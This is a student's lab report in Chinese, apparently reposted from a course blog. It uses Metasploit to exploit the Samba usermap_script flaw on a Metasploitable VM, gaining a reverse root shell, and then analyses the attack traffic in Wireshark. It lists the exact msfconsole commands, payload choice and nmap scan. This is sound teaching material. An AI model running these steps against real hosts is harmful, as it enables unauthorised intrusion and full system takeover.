ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

# 20211914涂可新 2021-2022-2 《网络攻防实践》实践七报告

2022-04-30 16:33:07  阅读:196  来源: 互联网

标签:涂可新 使用 实践 192.168 攻击 2021 Linux 靶机


20211914涂可新 2021-2022-2 《网络攻防实践》实践七报告

1.实践内容

Linux操作系统

Liunx系统大致可以分为4个层次,底层是硬件,之后是Linux操作系统,一般称之为系统内核(Kernel),中间是shell层,即命令解释层;高层则是应用层。

  1. 内核层
    内核层是Linux系统的核心和基础,他直接附着在硬件平台之上,控制和管理系统内各种资源(硬件资源和软件资源),有效地组织进程的运行,从而扩展硬件的功能,提高资源的利用率,为用户提供方便、高效、安全、可靠的应用环境。
  2. Shell层
    Shell层是与用户直接交互的界面。用户可以在提示符下输入命令行,由Shell解释执行并输出相应结果或者有关信息,所以我们也把Shell称做命令解释器,利用系统提供的丰富命令可以快捷而简便地完成许多工作。
  3. 应用层
    Linux系统上广泛应用的有Gnome、KDE等图形界面。

linux目录结构(前面有/)

bin (binaries)存放二进制可执行文件
sbin (super user binaries)存放二进制可执行文件,只有root才能访问
etc (etcetera)存放系统配置文件
home 存放用户文件的根目录
root 超级用户目录
dev (devices)用于存放设备文件
lib (library)存放跟文件系统中的程序运行所需要的共享库及内核模块
mnt (mount)系统管理员安装临时文件系统的安装点
boot 存放用于系统引导时使用的各种文件
tmp (temporary)用于存放各种临时文件
var (variable)用于存放运行时需要改变数据的文件

Samba

Samba:是在Linux和Unix上实现SMB协议的一个免费软件
结构:C/S
开放端口及对应服务:
TCP:
139 - 文件和打印共享 ; smbd (基于SMB(Server Message Block)协议,主要在局域网中使用,文件共享协议)
389 - 用于 LDAP (Active Directory Mode)
445 - NetBIOS服务在windos 2000及以后版本使用此端口, (Common Internet File System,CIFS,它是SMB协议扩展到Internet后,实现Internet文件共享)
901 - 用于 SWAT,用于网页管理Samba
UDP:
137 - NetBIOS 名字服务 ;nmbd
138 - NetBIOS 数据报服务

2.实践过程

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

实践使用的虚拟机信息如下:

虚拟机 IP地址 网络连接
kali(攻击机) 192.168.19.149 NAT模式
MetasploitableUbuntu(靶机) 192.168.19.139 NAT模式

开始实践:
step1
启动Metasploit软件,我使用的是msfconsole。

step2
搜索靶机上的Samba服务Usermap_script安全漏洞信息,输入指令为:search usermap_script

step3
根据msfconsole给的提示:Interact with a module by name or index输入指令:use exploit/multi/samba/usermap_script以使用该攻击模块。

step4
查看该攻击模块的攻击载荷,输入指令为:show payloads

step5
要选择攻击PAYLOAD为反向远程shell,那么我们选择No.18的攻击载荷:payload/cmd/unix/reverse,输入指令为:set payload 18

step6
设置攻击参数——攻击机和靶机的IP地址,配置攻击机:set LHOST 192.168.19.149 配置靶机:set RHOST 192.168.19.139

step7
检查一下配置结果是否正确无误,输入指令:show options,由图可知,配置成功。

step8
执行渗透攻击,输入指令:exploit

step9
查看是否正确得到远程Shell与获得的权限,与靶机IP地址对比可知攻击成功,且通过输入指令whoami可知,获得了root权限。

(2)实践作业:攻防对抗实践

实践使用的虚拟机信息如下:
实践使用的虚拟机信息如下:

虚拟机 IP地址 网络连接
kali(攻击机) 192.168.19.149 NAT模式
MetasploitableUbuntu(靶机) 192.168.19.139 NAT模式

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
step1
扫描靶机的开放端口和版本号等信息,输入指令:nmap -sV 192.168.19.139

step2
仍然使用实践(1)中的攻击模块进行攻击。

step3
攻击结果如下,已获得远程控制权与root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
step1
打开wireshark,监听获得网络攻击的数据包文件,分析可知攻击者的IP为192.168.19.149、目标IP为192.168.19.139,攻击端口为139。

step2
打开第一个TCP数据包具体分析,发现攻击时间是2022年4月30日15点36分17秒。

step3
追踪第一个SMB数据包的TCP流,发现攻击机是利用4444端口与靶机建立telnet服务。

step4
进一步分析'nohup sh -c'可知使用的是shellcode,由此可知攻击利用漏洞为Samba服务usermap_script安全漏洞。


step5
进一步追踪后续的数据包的TCP流,发现攻击者在攻击成功后输入的信息。

3.学习中遇到的问题及解决

  • 问题1:实践(1)中开始渗透攻击后,msfconsole提示攻击失败,无法创建连接。
  • 问题1解决方案:将攻击机与靶机的网络适配器改为NAT模式即可。

4.实践总结

本次实践是网络攻防实践课程的第七次实践,主要是进行了Linux远程渗透攻击,接第六次实践,本次实践使我在了解Metasploit软件的基础上,进一步熟悉了其使用方法。第六、七次实践都是通过某个攻击载荷进行攻击,而且渗透攻击都很深入,我们今后一定要及时检查系统漏洞、打好补丁,降低安全风险。

参考资料

标签:涂可新,使用,实践,192.168,攻击,2021,Linux,靶机
来源: https://www.cnblogs.com/tkx1914/p/16210520.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有